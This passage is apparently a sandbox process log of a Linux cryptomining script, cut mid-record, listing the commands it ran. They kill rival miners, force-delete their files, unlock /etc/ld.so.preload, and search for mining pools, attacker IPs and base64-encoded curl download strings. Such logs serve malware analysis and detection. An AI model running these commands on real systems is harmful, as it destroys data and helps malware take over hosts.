"process_name": "/usr/bin/pkill", "pid": 22022, "command_line_args": "pkill -f lx26" }, { "process_name": "/bin/rm", "pid": 22183, "command_line_args": "rm -rf /etc/cron.d/tomcat" }, { "process_name": "/bin/rm", "pid": 22196, "command_line_args": "rm /opt/atlassian/confluence/bin/1" }, { "process_name": "/usr/bin/pkill", "pid": 22059, "command_line_args": "pkill -f watchbog" }, { "process_name": "/bin/rm", "pid": 22206, "command_line_args": "rm -rf /var/tmp/1.so" }, { "process_name": "/bin/rm", "pid": 22204, "command_line_args": "rm -rf /var/tmp/config.json" }, { "process_name": "/usr/bin/pkill", "pid": 22026, "command_line_args": "pkill -f minerd" }, { "process_name": "/usr/bin/pkill", "pid": 22071, "command_line_args": "pkill -f xmrig-notls" }, { "process_name": "/usr/bin/awk", "pid": 22305, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22192, "command_line_args": "rm -rf /tmp/proc" }, { "process_name": "/usr/bin/pkill", "pid": 22057, "command_line_args": "pkill -f devtools" }, { "process_name": "/bin/rm", "pid": 22111, "command_line_args": "rm -rf /tmp/ddg" }, { "process_name": "/bin/rm", "pid": 22193, "command_line_args": "rm -rf /tmp/2.sh" }, { "process_name": "/usr/bin/pkill", "pid": 22036, "command_line_args": "pkill -f kworker34" }, { "process_name": "/bin/rm", "pid": 22231, "command_line_args": "rm -rf /tmp/config.json" }, { "process_name": "/usr/bin/awk", "pid": 22253, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/rm", "pid": 22217, "command_line_args": "rm -rf /var/tmp/nadezhda.x86_64.2" }, { "process_name": "/bin/rm", "pid": 22105, "command_line_args": "rm -rf /tmp/syslogd" }, { "process_name": "/bin/rm", "pid": 22175, "command_line_args": "rm -rf /dev/shm/.scr" }, { "process_name": "/usr/bin/xargs", "pid": 22344, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/rm", "pid": 22189, "command_line_args": "rm -rf /tmp/logo9.jpg" }, { "process_name": "/bin/rm", "pid": 22094, "command_line_args": "rm -rf /tmp/p2.conf" }, { "process_name": "/bin/rm", "pid": 22219, "command_line_args": "rm -rf /var/tmp/sustse" }, { "process_name": "/bin/rm", "pid": 22214, "command_line_args": "rm -rf /var/tmp/nadezhda.arm.2" }, { "process_name": "/usr/bin/pkill", "pid": 22007, "command_line_args": "pkill -f stratum" }, { "process_name": "/usr/bin/pkill", "pid": 22068, "command_line_args": "pkill -f init12.cfg" }, { "process_name": "/bin/rm", "pid": 22176, "command_line_args": "rm -rf /dev/shm/.kerberods" }, { "process_name": "/usr/bin/pkill", "pid": 22078, "command_line_args": "pkill -f kworkerds" }, { "process_name": "/usr/bin/pkill", "pid": 22018, "command_line_args": "pkill -f XJnRj" }, { "process_name": "/bin/rm", "pid": 22160, "command_line_args": "rm -rf /tmp/.tmpnewasss" }, { "process_name": "/usr/bin/pkill", "pid": 22064, "command_line_args": "pkill -f 121.42.151.137" }, { "process_name": "/usr/bin/pkill", "pid": 22027, "command_line_args": "pkill -f minergate" }, { "process_name": "/bin/rm", "pid": 22128, "command_line_args": "rm -rf /tmp/fs" }, { "process_name": "/usr/bin/chattr", "pid": 22179, "command_line_args": "chattr -i /etc/ld.so.preload" }, { "process_name": "/usr/bin/xargs", "pid": 22316, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22215, "command_line_args": "rm -rf /var/tmp/nadezhda.x86_64" }, { "process_name": "/bin/rm", "pid": 22136, "command_line_args": "rm -rf /tmp/.hod" }, { "process_name": "/usr/bin/awk", "pid": 22245, "command_line_args": "awk {print $1}" }, { "process_name": "/usr/bin/pkill", "pid": 22070, "command_line_args": "pkill -f tmp/wc.conf" }, { "process_name": "/bin/rm", "pid": 22154, "command_line_args": "rm -rf /tmp/.pt" }, { "process_name": "/usr/bin/pkill", "pid": 22048, "command_line_args": "pkill -f ddg.2011" }, { "process_name": "/bin/grep", "pid": 22336, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pkill", "pid": 22043, "command_line_args": "pkill -f irqbalanc1" }, { "process_name": "/bin/rm", "pid": 22208, "command_line_args": "rm -rf /var/tmp/kworkerdssx" }, { "process_name": "/bin/rm", "pid": 22161, "command_line_args": "rm -rf /tmp/java" }, { "process_name": "/usr/bin/xargs", "pid": 22320, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/grep", "pid": 22296, "command_line_args": "grep hello-" }, { "process_name": "/bin/rm", "pid": 22135, "command_line_args": "rm -rf /tmp/.mer.tgz.1" }, { "process_name": "/bin/rm", "pid": 22086, "command_line_args": "rm -rf /usr/bin/config.json" }, { "process_name": "/usr/bin/awk", "pid": 22314, "command_line_args": "awk {print $3}" }, { "process_name": "/usr/bin/xargs", "pid": 22254, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22042, "command_line_args": "pkill -f nopxi" }, { "process_name": "/bin/rm", "pid": 22147, "command_line_args": "rm -rf /tmp/systemd" }, { "process_name": "/usr/bin/pkill", "pid": 22034, "command_line_args": "pkill -f bonn.sh" }, { "process_name": "/usr/bin/pkill", "pid": 22035, "command_line_args": "pkill -f conn.sh" }, { "process_name": "/usr/bin/pkill", "pid": 22004, "command_line_args": "pkill -f Loopback" }, { "process_name": "/usr/bin/xargs", "pid": 22276, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/xargs", "pid": 22298, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/awk", "pid": 22262, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/grep", "pid": 22240, "command_line_args": "grep gakeaws" }, { "process_name": "/bin/rm", "pid": 22130, "command_line_args": "rm -rf /tmp/.rod.tgz" }, { "process_name": "/bin/rm", "pid": 22163, "command_line_args": "rm -rf /tmp/go2.sh" }, { "process_name": "/bin/grep", "pid": 22326, "command_line_args": "grep slowhttp" }, { "process_name": "/bin/rm", "pid": 22209, "command_line_args": "rm -rf /var/tmp/kworkerds" }, { "process_name": "/bin/rm", "pid": 22097, "command_line_args": "rm -rf /tmp/javax/config.sh" }, { "process_name": "/usr/bin/pkill", "pid": 22014, "command_line_args": "pkill -f ir29xc1" }, { "process_name": "/usr/bin/pkill", "pid": 22049, "command_line_args": "pkill -f wnTKYg" }, { "process_name": "/bin/rm", "pid": 22158, "command_line_args": "rm -rf /tmp/java" }, { "process_name": "/bin/rm", "pid": 22131, "command_line_args": "rm -rf /tmp/.rod.tgz.1" }, { "process_name": "/bin/grep", "pid": 21657, "command_line_args": "grep sustse3" }, { "process_name": "/usr/bin/cut", "pid": 21584, "command_line_args": "cut -c 9-15" }, { "process_name": "/usr/bin/awk", "pid": 21664, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21622, "command_line_args": "grep CnzFVPLF" }, { "process_name": "/usr/bin/xargs", "pid": 21938, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21757, "command_line_args": "grep miner.sh" }, { "process_name": "/bin/ps", "pid": 21684, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21652, "command_line_args": "grep sustse" }, { "process_name": "/usr/bin/pgrep", "pid": 21967, "command_line_args": "pgrep -f oracle.jpg" }, { "process_name": "/bin/grep", "pid": 21539, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21660, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21297, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21483, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21372, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21504, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21431, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21886, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21925, "command_line_args": "pgrep -f ./servceas" }, { "process_name": "/bin/grep", "pid": 21358, "command_line_args": "grep t2tKrCSZ" }, { "process_name": "/bin/ps", "pid": 21518, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21773, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21936, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21646, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21677, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21308, "command_line_args": "grep 86s.jpg" }, { "process_name": "/usr/bin/xargs", "pid": 21912, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21373, "command_line_args": "grep 3lmigMo" }, { "process_name": "/usr/bin/awk", "pid": 21536, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/sed", "pid": 21883, "command_line_args": "sed -e s/\\/.*//g" }, { "process_name": "/usr/bin/awk", "pid": 21653, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21367, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21709, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21816, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/pgrep", "pid": 21909, "command_line_args": "pgrep -f honvbsasbf.conf" }, { "process_name": "/bin/grep", "pid": 21746, "command_line_args": "grep curl" }, { "process_name": "/bin/grep", "pid": 21600, "command_line_args": "grep -v aux" }, { "process_name": "/usr/bin/xargs", "pid": 21942, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21959, "command_line_args": "pgrep -f kthreadd_svc" }, { "process_name": "/bin/ps", "pid": 21818, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/pgrep", "pid": 21949, "command_line_args": "pgrep -f kacpi_svc" }, { "process_name": "/bin/grep", "pid": 21436, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21453, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21738, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21750, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21899, "command_line_args": "pgrep -f IyEvYmluL3NoCgpzUG" }, { "process_name": "/bin/ps", "pid": 21604, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21575, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21527, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21558, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21552, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21799, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21486, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21300, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21771, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21315, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21631, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21929, "command_line_args": "pgrep -f ./vsp" }, { "process_name": "/bin/grep", "pid": 21447, "command_line_args": "grep nqscheduler" }, { "process_name": "/bin/ps", "pid": 21783, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21562, "command_line_args": "grep -v dblaunchs" }, { "process_name": "/usr/bin/awk", "pid": 21469, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21852, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21467, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21529, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21705, "command_line_args": "grep curl" }, { "process_name": "/usr/bin/awk", "pid": 21438, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/pgrep", "pid": 21903, "command_line_args": "pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6r" }, { "process_name": "/bin/grep", "pid": 21779, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21717, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21511, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 22002, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21336, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21932, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21776, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21698, "command_line_args": "grep logo9.jpg" }, { "process_name": "/bin/ps", "pid": 21576, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21697, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21512, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21826, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21460, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21679, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21987, "command_line_args": "pgrep -f ynn" }, { "process_name": "/bin/grep", "pid": 21298, "command_line_args": "grep 51.38.191.178" }, { "process_name": "/bin/grep", "pid": 21809, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21379, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21455, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21320, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21500, "command_line_args": "grep -E wnTKYg|2t3ik|qW3xT.2|ddg" }, { "process_name": "/usr/bin/xargs", "pid": 21896, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21656, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21404, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21443, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21490, "command_line_args": "grep rsync" }, { "process_name": "/usr/bin/pgrep", "pid": 21961, "command_line_args": "pgrep -f ksoftirqd_svc" }, { "process_name": "/bin/grep", "pid": 21588, "command_line_args": "grep -v aux" }, { "process_name": "/usr/bin/xargs", "pid": 21365, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21514, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21648, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21595, "command_line_args": "grep sh] <" }, { "process_name": "/bin/grep", "pid": 21854, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21344, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21641, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21401, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21613, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21795, "command_line_args": "grep 107.174.47.181" }, { "process_name": "/usr/bin/xargs", "pid": 21718, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21354, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21749, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21426, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21522, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21489, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21544, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21621, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21874, "command_line_args": "grep 46.243.253.15" }, { "process_name": "/bin/grep", "pid": 21764, "command_line_args": "grep wget" }, { "process_name": "/usr/bin/xargs", "pid": 21944, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21835, "command_line_args": "grep /tmp/a7b104c270" }, { "process_name": "/usr/bin/pgrep", "pid": 21923, "command_line_args": "pgrep -f ./servceaess" }, { "process_name": "/bin/grep", "pid": 21859, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21991, "command_line_args": "pgrep -f jmxx" }, { "process_name": "/usr/bin/pgrep", "pid": 21905, "command_line_args": "pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4" }, { "process_name": "/bin/ps", "pid": 21466, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21882, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21484, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21850, "command_line_args": "grep xmr.crypto-pool.fr:443" }, { "process_name": "/usr/bin/awk", "pid": 21289, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21794, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21623, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21395, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21781, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21278, "command_line_args": "grep /tmp/jmx*" }, { "process_name": "/bin/grep", "pid": 21601, "command_line_args": "grep \\[]" }, { "process_name": "/usr/bin/xargs", "pid": 21964, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21425, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21913, "command_line_args": "pgrep -f stratum" }, { "process_name": "/usr/bin/awk", "pid": 21735, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21766, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21321, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21956, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21563, "command_line_args": "grep -v dblaunched" }, { "process_name": "/usr/bin/pgrep", "pid": 21995, "command_line_args": "pgrep -f sysstats" }, { "process_name": "/bin/ps", "pid": 21346, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21977, "command_line_args": "pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPX" }, { "process_name": "/usr/bin/awk", "pid": 21806, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21295, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21422, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21990, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21545, "command_line_args": "grep ksoftirqds" }, { "process_name": "/bin/ps", "pid": 21523, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21791, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21283, "command_line_args": "grep /tmp/2Ne80*" }, { "process_name": "/usr/bin/awk", "pid": 21309, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21751, "command_line_args": "grep miner.sh" }, { "process_name": "/usr/bin/xargs", "pid": 21569, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21675, "command_line_args": "grep wget" }, { "process_name": "/bin/grep", "pid": 21313, "command_line_args": "grep aGTSGJJp" }, { "process_name": "/usr/bin/xargs", "pid": 21542, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21941, "command_line_args": "pgrep -f ./haveged" }, { "process_name": "/usr/bin/awk", "pid": 21682, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21908, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21645, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21822, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21924, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21331, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21935, "command_line_args": "pgrep -f ./vpp" }, { "process_name": "/bin/grep", "pid": 21468, "command_line_args": "grep 0kwti6ut420t" }, { "process_name": "/usr/bin/awk", "pid": 21556, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21259, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21984, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21277, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21337, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21654, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21380, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21888, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21743, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21450, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21741, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21266, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21706, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21304, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21855, "command_line_args": "grep stratum.f2pool.com:8888" }, { "process_name": "/usr/bin/xargs", "pid": 21952, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21477, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21840, "command_line_args": "grep xmr.crypto-pool.fr:6666" }, { "process_name": "/usr/bin/xargs", "pid": 21482, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21528, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21293, "command_line_args": "grep 45.76.122.92" }, { "process_name": "/bin/grep", "pid": 21789, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21722, "command_line_args": "grep curl" }, { "process_name": "/bin/grep", "pid": 21673, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21611, "command_line_args": "grep /tmp/zmcat" }, { "process_name": "/bin/ps", "pid": 21696, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21585, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21681, "command_line_args": "grep curl" }, { "process_name": "/bin/grep", "pid": 21253, "command_line_args": "grep /tmp/dl" }, { "process_name": "/bin/ps", "pid": 21640, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21636, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21349, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21759, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21591, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21762, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21593, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21424, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21642, "command_line_args": "grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjI" }, { "process_name": "/usr/bin/pgrep", "pid": 21981, "command_line_args": "pgrep -f servim" }, { "process_name": "/usr/bin/xargs", "pid": 21420, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21985, "command_line_args": "pgrep -f native_svc" }, { "process_name": "/usr/bin/awk", "pid": 21628, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21819, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21864, "command_line_args": "grep xiaoyao" }, { "process_name": "/usr/bin/awk", "pid": 21269, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21745, "command_line_args": "grep he.sh" }, { "process_name": "/usr/bin/awk", "pid": 21299, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21817, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21668, "command_line_args": "grep mr.sh" }, { "process_name": "/bin/ps", "pid": 21386, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21471, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21797, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21397, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21549, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21586, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21312, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21434, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21326, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21551, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21869, "command_line_args": "grep xiaoxue" }, { "process_name": "/usr/bin/awk", "pid": 21846, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21257, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21319, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21785, "command_line_args": "grep 51.38.203.146" }, { "process_name": "/bin/grep", "pid": 21699, "command_line_args": "grep wget" }, { "process_name": "/bin/grep", "pid": 21880, "command_line_args": "grep 176.31.6.16" }, { "process_name": "/bin/grep", "pid": 21342, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21832, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21878, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21693, "command_line_args": "grep curl" }, { "process_name": "/bin/grep", "pid": 21661, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21394, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21307, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21778, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21973, "command_line_args": "pgrep -f 181.214.87.241" }, { "process_name": "/bin/grep", "pid": 21408, "command_line_args": "grep http_0xCC033" }, { "process_name": "/usr/bin/pgrep", "pid": 21919, "command_line_args": "pgrep -f cryptonight" }, { "process_name": "/usr/bin/xargs", "pid": 21649, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21411, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21520, "command_line_args": "grep /tmp/java" }, { "process_name": "/bin/ps", "pid": 21498, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21550, "command_line_args": "grep netdns" }, { "process_name": "/bin/ps", "pid": 21396, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21934, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21736, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21543, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21634, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21740, "command_line_args": "grep wget" }, { "process_name": "/usr/bin/awk", "pid": 21389, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21333, "command_line_args": "grep AgdgACUD" }, { "process_name": "/usr/bin/awk", "pid": 21765, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21978, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21857, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21678, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21538, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21534, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21902, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21695, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21502, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21590, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21541, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21390, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21848, "command_line_args": "ps auxf" }, { "process_name": "/bin/grep", "pid": 21323, "command_line_args": "grep PuNY5tm2" }, { "process_name": "/usr/bin/xargs", "pid": 21976, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21627, "command_line_args": "grep CvKzzZLs" }, { "process_name": "/usr/bin/xargs", "pid": 21892, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21983, "command_line_args": "pgrep -f kblockd_svc" }, { "process_name": "/bin/grep", "pid": 21347, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21362, "command_line_args": "grep -v grep" }, { 